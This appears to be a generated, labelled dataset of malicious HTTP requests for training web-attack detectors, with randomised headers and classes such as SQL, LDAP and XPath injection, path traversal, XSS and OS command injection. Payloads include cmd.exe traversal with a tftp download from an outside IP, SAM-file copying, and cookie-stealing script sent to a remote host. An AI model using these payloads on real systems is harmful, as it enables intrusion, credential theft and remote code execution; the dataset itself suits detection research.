Referer: /r3iUdph/in6iao/yihmwa/6oeh.jsp
TE: deflate,trailers,gzip;q=0.7
Trailer: Range
User-Agent: 9tsie4sr (e-iPyG5u)
UA-CPU: PowerPC
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: 6.8 www.reebli8.shtml, 4.2 2.13.55.32
Transfer-Encoding: deflate
Upgrade: ueiyd/3.1, tac/2.4, eiz/0.3, isofl/2.9, eutR/4.6
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39243
Start - Id: 43222
class: OsCommanding
GET /VU5/Tesacjr/uxT@xWGoG_@6oOLAl/t-1Ss5WyN./kG9fhttpEHzSd/bdrtrsdyeculeoAsa/cxuIFEAY/1Wwacceptt/nQTukSrg1mkJ.aspx?ttohdtEnpobd=%250A++xterm++-display++++www.annaasmaon.com%3A0.0++&neastete=xs&9dw9d=539012&otDatesu2mPoce=46tiU4cart&YpM0dM8vSV=7818 HTTP/1.0
Host: 43.136.100.105
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic, iso-2022-kr;q=0.9
Accept-Encoding: deflate;q=0.0, gzip;q=0.8, identity;q=0.0
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 141.13.227.191
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="492"
Date: Sat, 15 Mar 08 18:24:52 UTC
ETag: "jFG60__zORw9NeLYzkw"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Mon, 08 Sep 08 08:49:33 GMT
If-Unmodified-Since: Wed, 27 Jan 10 09:11:49 CET
If-Match: "ZfzlTNiogMaFknCW1"
If-None-Match: *
If-Range: Fri, 31 Jul 09 14:00:06 CET
Max-Forwards: 61
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="sgaC"
Authorization: ecgiuk Sgoo=c8dnnr
Range: 54119-349098
Referer: /xCath.jsp
TE: trailers
Trailer: Referer
User-Agent: hvoenoeoaau
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 476x125
Via: HTTP/0.8 7.114.147.168:60733
Transfer-Encoding: identity
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 633 195.113.214.10 "tse9mteOot6asnp" "Thu, 30 Jun 05 07:11:38 GMT"
X-Forwarded-For: 240.202.139.239
X-Serial-Number: 3512760212193
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43222
Start - Id: 45756
class: PathTransversal
GET /om6Lu/onhn/pL6wNRtwRsp1.jpeg?tba=47047778&hRt1dtnhiel=00&tBgn=ewaSbK&yTonAhth=g+eh%26fil%3Dmlho&eb4uu4ot5y1=e&psidorz4emtbe=i%3A%5Cwindows%5Cboot.ini&Teeersslrpbns=5291437&eniLTeahM2sa5ro=Aqbhno&et=p7n&lorieye=29&2ezct=916093&mt=nS%40_ HTTP/1.1
Host: www.ulmtg5am.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 84.7.154.77
Cookie: jh0eoorbxu=3
Cookie2: $Version="51"
Date: Thu, 19 Nov 09 16:47:52 CET
ETag: "NdluKyEsbt3wqR6uNr"
Expect: 100-continue
From: nbuYYe@rnspS.ch
If-Modified-Since: Mon, 13 Sep 04 22:37:36 GMT
If-Unmodified-Since: Tue, 16 May 06 15:02:59 UTC
If-Match: *
If-None-Match: "0wyDUnO7Su37hLVaUyh"
If-Range: *
Max-Forwards: 956
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: powh Orrwo=yrnt5em
Authorization: Digest response="094fe2ECEd1ec8875845BBFbA6Aae73d"
Range: -500252,934-3694
Referer: /oei2.jpg
TE: chunked,trailers,deflate;q=0.7
Trailer: From
User-Agent: 0eaaaHw2
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x559
Via: saehs/0.0 www.fcaW2ptt.shtml:909
Transfer-Encoding: 3Epmo
Upgrade: aGdne/3.3, slrmIL/7.0, hsea/2.9, wrhit/9.0
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 8409681186997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45756
Start - Id: 44367
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.1
Host: 31.178.215.186
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.6, deflate;q=0.3, identity;q=0.1, identity
Accept-Language: 9dki5soo-teunTlu, eeEtt-aauFop5n, i-Ahh1;q=0.7, 1itrtr-nthxz3w;q=0.9
Cache-Control: only-if-cached
Client-ip: 85.70.71.191
Cookie: meilfiiue6grl=291561649;dSgroup byo3hLaccess_logYdl9=492260;BfRVO@.81R=cOdROL;e6hi8QtdupoNdh=en64tRN;tgmnssnaauDust=4;okobe=8saHacEeyhph~bn
Cookie2: $Version="768"
Date: Wed, 16 Dec 09 22:16:00 GMT
ETag: W/"X03YS.cWv2WZh-ADngvT"
Expect: p4ymocrd
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Thu, 05 Nov 09 01:53:09 UTC
If-Unmodified-Since: Sun, 23 Mar 08 19:01:14 CET
If-Match: *
If-None-Match: *
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 49
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest qop=auth
Range: -126597,56874-704
Referer: /cnCgt/oaruo/oedfi/tpw8eam/wl1c.html
TE: gzip;q=0.8
Trailer: Cache-Control
User-Agent: Mozilla/5.5 (compatible; MSIE 9.9; WinNT; eoToh4de; esru; neeskn)
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 347x4806
Via: FTP/7.3 www.JuteehA.tiff
Transfer-Encoding: vhcl
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44367
Start - Id: 38037
class: LdapInjection
GET /jkzRaa/ozitsaztxe5wtncam/94istethocrfk0oipps/d3dl6J0u_TT/e.f/_y/ntilenaNrO2Doir/jzkPopenRWN3TirD/52Egssiie/obtfhknyeB.shtml?ofFpsHps5s=%29+++%28+++%7C++%28+cn%3D*o++++%27brien*%29%28mail++++%3D*o++%27brien*+++%29+++ HTTP/1.1
Host: www.LqeaeiLtyA.biz
Connection: cgemAa
Accept: */*;q=0.8
Accept-Charset: euc-tw, macintosh;q=0.4, x-mac-chinesetrad, windows-1250, euc-tw;q=0.5
Accept-Encoding: *
Accept-Language: rnussnin-e2s;q=0.4, Nb-gF, 52r-erieeead;q=0.1, t-g7rNass
Cache-Control: only-if-cached
Client-ip: 132.58.25.160
Cookie: gbichE70d=+lsE;topiFiahrahda=8mhs;9fws=31178361;vSaperlPbNc-A=ochildkQoetrvbscript
Cookie2: $Version="18"
Date: Sat, 17 Apr 10 06:26:55 UTC
ETag: W/"cHzmsJXC@p5XTqXk@"
Expect: 100-continue
From: deigiel@Ostrbaef.it
If-Modified-Since: Tue, 15 Sep 09 20:04:22 CET
If-Unmodified-Since: Tue, 13 Oct 09 03:34:09 CET
If-Match: "JgvRbWckZE@t5A749rg2"
If-None-Match: *
If-Range: "kwWSFsoczEiUFRP5kPO0"
Max-Forwards: 2952
MIME-Version: 8.2
Pragma: dhaqfhe='c'
Proxy-Authorization: NTLM eW9hQm41aGRzYkZwdG9yc3Roc2Ftd3BrYXdySTR4aGFt
Authorization: of2es dbq0td=t9rej
Range: 912090-,47-25
Referer: /4t2fa/z4rNeEeo/t0tyt/rmra.exe
TE: trailers,deflate;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/5.2 (compatible; i4eoro; Mac OS X; uieSbeij)
UA-CPU: MIPS
UA-Disp: 879,787,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 427x816
Via: mcr/5.7 www.intoeti.gif, 9.0 107.34.47.159, 5.7 www.rsiy0du.png
Transfer-Encoding: deflate
Upgrade: ttnx/4.7, Mocaid/6.1, lsgsia/7.3, sekx/3.8
Warning: 864 185.80.26.144 "Nciqesnma5Srctnr" "Wed, 25 Nov 09 18:45:33 UTC"
X-Forwarded-For: 212.17.65.81
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38037
Start - Id: 41339
class: SqlInjection
GET /7eniS903/azZqz-/o-sHZBNvxaLxWYyd7/sy/iKkgXd1.pHRzaRofKs.aspx?geewir8epdp=o0J&ht=spfD&perotd13=3daAcymsme&folnworma115=ad%26%7Ct&hnAt=18474854 HTTP/1.1
Host: www.yteWUn.be
Connection: close
Accept: */*
Accept-Charset: x-mac-roman;q=0.3, euc-kr;q=0.3, iso-8859-15;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 171.71.195.21
Cookie: 7qutsqjfiei-=;     EXEC(    'INS'+'ERT     INTO  users   values(8304,'d2EGlrem','eeer'));acaose5= ;m3kR1varXtXmed=a_wt
Cookie2: $Version="717"
Date: Thu, 23 Apr 09 16:32:19 GMT
ETag: W/"5H.LQ-peGLZ9PLDahfV"
Expect: tsIt=hhr2ifs
From: oprs@hshefehi.biz
If-Modified-Since: Sat, 25 Jun 05 02:35:37 GMT
If-Unmodified-Since: Sun, 23 Nov 08 09:18:11 GMT
If-Match: "aQodJlhy8flQDURVoMm"
If-None-Match: *
If-Range: "9Lv.ouizKH0pBfu"
Max-Forwards: 16
Pragma: rdIsav='ci'
Proxy-Authorization: imhseH tefiqi=eset
Authorization: NTLM M2RlTjNpdEVmZmV0cnNxdGlqb3N1cnd0b3MyaWRuYWRzaHVlZk5zdGh0SXR3Y0M=
Range: 91736-3
Referer: http://www.ibbN6mea.st/uBNktsi/anea.swf
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 1.9; r0-mw; rv:5.0.9) Gecko/15102340
UA-Color: color32
UA-Pixels: 431x942
Via: 5.4 www.yttuc.html, 9.1 www.noa0or.jpg
Transfer-Encoding: deflate
Upgrade: lrh3x/8.6
Warning: 357 219.139.39.60 "faenat" "Sat, 31 May 08 12:41:00 UTC"
X-Forwarded-For: 168.51.164.252
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41339
Start - Id: 35334
class: SqlInjection
GET /enr0oidouluiiirsy/fzTXU@y8UJ3yyTW0Rm/2RA4FfS/een8ra9tbj1v/myF_9hYDEYXA9w_O-G/lb8DGxWP-kdSV5/tacs.png?opt7wp@IFkh9zi=1447953953&erolnyf5o48z=rehome&waensr2g=sLtshoticvL9&ucgiI0=%27+++++UNION++++++++ALL+++++++++++++SELECT++8tea+++++FROM++++oiiy9t+++WHERE++%27%27%3D+%27&8bBW3bI=tYmQYs8&vIt5meTFroprocessing-instruction=7vpNo8.&Aktai=69745674&tiY=tNv8ZprP&erjw=eah&copyAES=ts&S5GOw94a9=ordeeltyznn++%26+m%24adh HTTP/1.0
Host: 129.61.168.36:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, identity;q=0.4, compress;q=0.0
Accept-Language: m-jnsarrwY;q=0.6, Tou-wtsitn;q=0.8, ieerxeeh-lTtr
Cache-Control: max-age=059
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="68"
Date: Tue, 13 Jun 06 19:06:22 GMT
ETag: "QOvh8ehD1t657W06o5"
Expect: Umhv
From: atozRhO@AwAlyrse.it
If-Modified-Since: Sun, 12 Jul 09 17:47:03 GMT
If-Unmodified-Since: Mon, 03 Sep 07 08:16:27 GMT
If-Match: "eQOGugBRS_UQ1ozIYx"
If-None-Match: *
If-Range: Fri, 15 Feb 08 23:20:46 GMT
Max-Forwards: 683
MIME-Version: 8.0
Pragma: norn4bs=Y
Proxy-Authorization: NTLM enRmOG93dDN5b3Rubk1oM29ObWVZenRCbnJibmltdFllRnQweW8wb1RuN3BoZQ==
Authorization: NTLM czhNYUllclJ0QnBzMHNhNjBzN2FyYWFPdW5laWllbHRlZWJlYXB0dGZ6bzhmbmg=
Range: 16442-228208
Referer: http://ksubde.de/lenEO/olNx.css
TE: trailers,deflate
Trailer: Via
User-Agent: asn4bt3
UA-CPU: StrongARM
UA-Disp: 339,8001,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: HTTP/7.5 211.208.223.131, 8.2 79.235.211.198, FTP/9.7 www.aaSa.shtml
Transfer-Encoding: identity
Upgrade: NIvpys/3.1, spa/2.0, t1ci/3.2, hga/3.0, nvtc/0.2
Warning: 857 www.af1tY.jpeg "vltHuipbeAndrm" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 9356932
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35334
Start - Id: 36173
class: PathTransversal
GET /7R4/trMH1jId4Dj4BCY/nE8flHgSsVF/hyLs_rr0slvSj1/RMAR1s/zOxonzYoFh7zRvml/s5eirhtmogeewhos/ue8dTgc/aXio7l/o_f90UFsxba.PAl@v6vw/tfhtbhsdu8s1pir/n1ean5fenhoI.htm?uleepjthzati=1270836&otesslytptzoS=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&6ndaeeadb1tclyt=nGsio&pmroxS=er0dn HTTP/1.0
Host: www.uthiptE5ek.com
Connection: aog1t2
Accept: */*;q=0.3
Accept-Charset: macintosh, iso-8859-7;q=0.8, x-mac-arabic;q=0.7
Accept-Encoding: gzip;q=0.3, compress, identity;q=0.1, deflate;q=0.3
Accept-Language: 6s3eTo-sgUars7e;q=0.1, eizs7ses-nyatONu, ne-b91kbrr;q=0.0, n-recj, p-er;q=0.6
Cache-Control: max-stale
Client-ip: 164.195.241.61
Cookie: -mXlink=dpCZRN_nMm;enesoblA3=760
Cookie2: $Version="99"
Date: Mon, 22 Mar 10 17:31:13 UTC
ETag: W/"rLPib2j-x4Vz7kREpS67"
Expect: ojnuth
From: esie@ntoatbni.fr
If-Modified-Since: Thu, 29 Apr 04 08:13:08 CET
If-Unmodified-Since: Thu, 18 Sep 08 12:05:23 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 042
Pragma: 4tmgrr='w'
Proxy-Authorization: Digest nonce
Authorization: Basic ZWVzbmY1OnFoSG9hVWxy
Range: 462654-
Referer: /mytbei/7hnvhn/nCtmnry.jsp
TE: trailers,trailers
Trailer: Pragma
User-Agent: e7K8zkRSb http://www.em2s.st
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: HTTP/3.1 www.dhrr3.shtml
Transfer-Encoding: compress
Upgrade: sBc8h/5.5, Lnio/4.6, olj9p/0.5
Warning: 282 www.mar3eOer.jpg "Gzeol4" 
X-Forwarded-For: 214.211.159.226
X-Serial-Number: 4255971850
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36173
Start - Id: 47943
class: XSS
GET /ehV.1/naotcne/du2e.html?Vfhtrceb=3488258521&eL=aroerEbu&eadsttpetySY=161032&rgi=si&eilhcestluyAn52=6375844590&eeae=7Zk.A.f&uniavhjrn5briTD=khhRHF&hhehnj2e2r=lGNnoMft+noi%3B&sen=hhttpsyhe2%28&5t0jsNo=%3Ca++href++%3D++%22++++javas%26%2399%3Bript%26%2335%3B%5Balert+++%28%27rlytea%27%29%3B%5D++%22++++%3E HTTP/1.0
Host: 140.246.66.135
Connection: close
Accept: application/*, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dbta-oe3, af-eco, a8mNel-f5asur;q=0.9, dtIa-nssHg1;q=0.6, renxh8e0-oh
Cache-Control: no-cache
Client-ip: 55.58.52.249
Cookie: nost0n=:eew;4Air6os=) wn[orrzstront
Cookie2: $Version="16"
Date: Fri, 05 May 06 05:50:04 GMT
ETag: "dkVEE-H0oxW@ES_Bxo3p"
Expect: nrmash=oeIs4neR;etmomp=ogtht
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Wed, 08 Nov 06 17:51:17 GMT
If-Unmodified-Since: Thu, 30 Nov 06 09:40:01 CET
If-Match: "_@TaipZZGQ5OuW1tZM"
If-None-Match: "6fMxosNtk.Y1aaKSxNf"
If-Range: Tue, 04 Mar 08 04:52:56 UTC
Max-Forwards: 8401
MIME-Version: 2.0
Pragma: 0ieesmi='eer1'
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: NTLM Q2J0c25nczVSb2VMb3NvdHJkOHJpTkUzZWVwYXRlaUM5b3Nub3ZvdQ==
Range: 44-,8-
Referer: http://hont.ch/0zmy/2aoinbiI/aSe3.jsp
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/9.2 (compatible; ghsa3diAea; Windows NT; e3t3geIt7; ptrhtmei0a; mnf4LDp)
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7476x522
Via: FTP/4.0 149.105.135.90, 0.7 164.104.37.26:6744, 6.4 223.146.211.255:59505
Transfer-Encoding: compress
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 608 117.63.178.23 "ioeihi" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47943
Start - Id: 44171
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: www.utgK.it
Connection: close
Accept: audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: md4a='aip8t51c'
Client-ip: 16.77.22.217
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="0"
Date: Fri, 15 Jan 10 05:28:20 GMT
ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: d5etln=atx6G
From: a6ssEboa@0sqFIsecq.uk
If-Modified-Since: Wed, 16 Apr 08 16:49:15 GMT
If-Unmodified-Since: Mon, 23 Jul 07 03:45:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 777
MIME-Version: 3.5
Pragma: yt3wt='hoet'
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: e8aie hagD=reidhsdm
Range: 5-,-97,-5
Referer: /fmmwdQi.exe
TE: deflate;q=0.9,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 9.7; 0e-ib; rv:1.2.2) Gecko/90124049
UA-CPU: Sparc
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 0.6 252.49.31.229:7678
Transfer-Encoding: deflate
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 195.218.223.142
X-Serial-Number: 386658457153334430
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44171
Start - Id: 47342
class: XSS
GET /rYo/RPj/net3srdns/tjRHietxrWLOZnEe/dcispmobatdtRmoseUy/i419r7-XHpe11K/ie0hkrll8ar70soehoeA/4-0T-WC.JDb/tlhiaThhGttnIaltg/nQ-8H1XAmdy7lP/dcetlmwanhsenlm.php?tvtlllrIdhaossh=aAimgf&sRlIo5nenetnteT=ey&dekeb1dywtOka=%3Cimg+++++src++++%3D++++%22+ninasionon++%3E+++%22+onmouseover+%3D++++%22+++++%5Bwindow.open%28%27http%3A%2F%2F211.93.149.40%2Finma.dll%27%2Bdocument.cookie%29%3B%5D++++%22++++%3E&r5zi7unaha=328518 HTTP/1.1
Host: www.do1ee5.ch
Connection: close
Accept: application/rtf
Accept-Charset: x-mac-arabic;q=0.8, iso-10646-ucs-2;q=0.0, iso-8859-5
Accept-Encoding: 
Accept-Language: eldnan-c, h-9te;q=0.6
Cache-Control: no-transform
Client-ip: 108.182.85.89
Cookie: h6isetsgc=re2oeJ7l
Cookie2: $Version="38"
Date: Mon, 14 Sep 09 21:00:33 UTC
ETag: W/"@ohBoT1s.JGyaGLB2"
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Sun, 04 May 08 22:32:47 GMT
If-Unmodified-Since: Fri, 02 Sep 05 03:03:40 GMT
If-Match: "4SUILGc06mQVxz@"
If-None-Match: "xUk.RVhUCxwb8mpPpm"
If-Range: *
Max-Forwards: 2956
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: enasah rn0m=tlqoc
Range: -066761,152-
Referer: /tu2dt/ftevt/Eraiq/sjlYerh/dusnectd.txt
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: elFzXNqaID http://www.ksie.org
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/5.9 176.31.159.123:6
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47342
Start - Id: 48565
class: XPathInjection
PUT /wKzzqZc/-5/UmAiGgzSB.hprocessing-instructionclogO/soc4nkiua/sotrtntthaayubrt1/ctsonlh.tiff? HTTP/1.0
Content-Length: 185
Content-Language: etez,eotedh,ufsda
Content-Encoding: compress
Content-Location: http://www.tOsut.be/wTfe/luaYfd/eomvedt6/tsogat/6ehaym3.mpeg
Content-MD5: dG81bnFyYWFzYWlldXc2aA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Oct 08 18:11:54 UTC
Last-Modified: Sun, 22 May 05 04:47:32 GMT
Host: 33.97.11.125
Connection: etsvuv
Accept: image/*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 5.57.77.191
Cookie: it=]m;7tztTaDn=4;atno5o=r/e;eq=6;maieaioZ=znOp;tsl=ecwmf
Cookie2: $Version="98"
Date: Tue, 27 Feb 07 04:35:21 CET
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: Sqiorccr=plsduge
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 04 Aug 09 05:48:08 GMT
If-Unmodified-Since: Sun, 07 May 06 01:57:00 CET
If-Match: "0p6whxnO@F7KRjR"
If-None-Match: "uR5RYQlVWfXpJdk"
If-Range: Thu, 13 Nov 08 13:14:49 GMT
Max-Forwards: 3
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: siue bdclebse=ssaui
Authorization: Basic YUVzSTdvOmdlc2lzRW1h
Range: -99
Referer: http://ozyu5.be/etnSpv/eset.sh
TE: chunked;q=0.7
Trailer: Date
User-Agent: ryeopsg/6.0.1
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: 7.9 www.erot.png
Transfer-Encoding: nhRze
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 651 www.filmtc.css "8HFtmshdumhqpyai" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

sjldodp=aanestsqts7&to5eE=%uht)y&tAjnmmzfzd=ejo&eeo=aitLVoi9&tAnRannaeh=4wis'] |  P   |  //user[   name/text(    )   =    'bn3i&leirosc=6rdhttn&lira=31339351

End - Id: 48565
Start - Id: 43953
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 102.192.58.30
Connection: close
Accept: */*;q=0.2
Accept-Charset: utf-7;q=0.4, x-mac-arabic, iso-10646-ucs-2, x-mac-chinesetrad;q=0.0, utf-7;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 167.244.39.243
Cookie: XZ4cpWW7vqcI=/w6oyecM;/t>6 htacces ig ;jsozoenf=Rd;aabsi=Pst;nn8aia= &nph-D;tiutt6seen4q=5279013;kqreiseTxauNa=at1
Cookie2: $Version="790"
Date: Thu, 21 May 09 18:28:57 UTC
ETag: "Nd4SKGTA_nnaZTH0"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Sun, 30 May 04 15:32:31 GMT
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: "ODgc4cyMJr@4jwx32IM"
If-None-Match: *
If-Range: Sat, 24 Jan 04 24:31:49 UTC
Max-Forwards: 9
MIME-Version: 7.7
Pragma: tdghaoVa='Rgnih'
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: Digest realm
Range: 97793-3,500796-0
Referer: /jaaSu4qt/iraistj4/ahhrd/so4erFen/ersnlxte.jsp
TE: trailers
Trailer: Via
User-Agent: oasnsyoymjn
UA-CPU: 68000
UA-Disp: 068,6822,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 539x520
Via: 4.4 178.53.171.229
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43953
Start - Id: 42887
class: OsCommanding
GET /f7t4na.NlxLi8J@BB8t/RhedrtcI1/peduborohna4t/cdA.gif?ps3wUm=9Eon+%5Cdhsta3h&andn=Edwtehometl&9epA9ao=94023595&inr=5D%3Fe77enCSpaIIn%7C&msOi7mjeNrE=ojfe0d&ccthecoa=%29Sz%5Dtbrt1&dr=t5%26&yenYweed=sehngmsat%3Bo6cdh&ggedgllmsre=240.255.76.245+++%7C+copy+c%3A%5Cwinnt%5Crepair%5Csam._+c%3A%5Cinetpub%5Cwwwroot%5Csam.ddd&dgee=658&6ieUsjrtndbb=10&et=2&Ix6oevveR7=dhzlehb5 HTTP/1.0
Host: 116.118.14.157
Connection: close
Accept: */*;q=0.0
Accept-Charset: hz-gb-2312, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=13226
Client-ip: 96.55.27.134
Cookie: dFbUmocha=379;eor6edU04ahimtf=raef;cioToot=59730645
Cookie2: $Version="01"
Date: Thu, 05 Feb 04 18:06:03 GMT
ETag: "Wp7NOJ9WHkU4s9jlY"
Expect: tlgm
From: n2zse0bo@tibsA.uk
If-Modified-Since: Wed, 16 Nov 05 22:05:02 GMT
If-Unmodified-Since: Sun, 27 Jan 08 12:10:25 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Apr 10 20:29:19 CET
Max-Forwards: 8637
MIME-Version: 9.3
Pragma: unf=lUwhyeeg
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: Basic bWF0UzppYXVpYWlsdA==
Range: 34480-7538,5879-,186-597
Referer: /epmst/tiotDO/st29sh/amtiH/ntilreis.aspx
TE: trailers
Trailer: Upgrade
User-Agent: yRyzM4P http://www.odec6i.uk
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4835x5695
Via: 4.2 104.99.53.44, HTTP/1.9 www.sd1tt.html
Transfer-Encoding: deflate
Upgrade: dal3ei/8.1, medohh/7.9, vcief/8.1, tln78a/9.5, fsssme/7.1
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 7523333494346880207
----: -----------------------------------------------

null

End - Id: 42887
Start - Id: 44172
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: www.oWMRproohe.it:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1251;q=0.3
Accept-Encoding: 
Accept-Language: x2wi-oi;q=0.2, trPseC-8ptye, nhegEi8t-CoAb;q=0.6, uKgtou-sss;q=0.9, osets-9e3pwb5
Cache-Control: md4a='aip8t51c'
Client-ip: 16.77.22.217
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="0"
Date: Wed, 21 Apr 04 19:46:47 CET
